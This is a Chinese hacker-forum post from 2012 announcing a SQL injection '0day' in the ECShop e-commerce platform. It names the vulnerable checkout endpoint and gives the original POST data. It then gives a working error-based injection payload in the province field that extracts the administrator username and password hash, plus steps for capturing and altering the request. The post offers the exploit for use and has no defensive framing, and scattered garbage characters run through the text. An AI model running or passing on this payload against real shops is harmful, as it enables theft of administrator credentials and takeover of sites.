找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2286|回复: 0
打印 上一主题 下一主题

ECShop全版本SQL注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:19:27 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
感谢欠杀的黑盒
+ r  W4 B. f$ [0 _# U2 ?; J; j  |' b% g% g: j) k  w" _: M
" r2 W6 S1 ?5 x6 {5 C* U
把任意商品加入购物车在填写配送地址那一页,有地区选择
; d! V3 ~% u( A8 t. K
4 r- X# L% C( o+ y7 r0 ~5 jflow.php?step=consignee&direct_shopping=1
. w) H( w! T+ K, |" V5 P比如省选择安徽) O1 T( |5 o' ~0 D
7 x' V1 r) `7 `. O+ ^2 Y) v! X5 P
其中POST数据如下/ D5 e0 G2 \8 z# Q2 R  r: o
- B9 z- @0 h" p3 k" m/ O! Y/ T  J
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=35 T8 n8 g+ D. x- o4 ]  A) n+ p- W
改成
  ~# s, j7 ~2 a
9 y9 g, `, N1 S3 Q* m/ `/ fprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
# ^6 H- ^" B5 e( p9 p, \% ops:详细的方法,用火狐tamper data插件……..即可改post内容…..
9 H* t6 i; y% g$ Z1 P; K & v$ S1 c1 @; J" [' `! G1 }
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
% g( J; Q; C: b" V: Y ! A  G: r4 N( `% E$ v! k* Z
就会回显错误页面了。。。。
8 g; l- N  A/ G$ y5 s& q 3 [! B- O2 \3 ]3 x
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
9 s8 P' _5 P, H( v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表